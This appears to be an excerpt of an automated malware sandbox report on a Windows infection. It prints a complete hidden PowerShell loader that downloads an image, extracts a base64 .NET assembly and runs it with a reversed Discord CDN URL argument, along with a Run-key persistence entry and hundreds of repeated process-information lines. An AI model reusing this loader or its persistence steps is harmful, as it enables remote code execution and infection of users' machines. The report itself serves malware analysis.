        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D000BD pushad ; iretd 2_2_00007FF848D000C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D200BD pushad ; iretd 6_2_00007FF848D200C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D2114D push E85DB0FAh; ret 6_2_00007FF848D211F9

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\cognitivo.vbsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
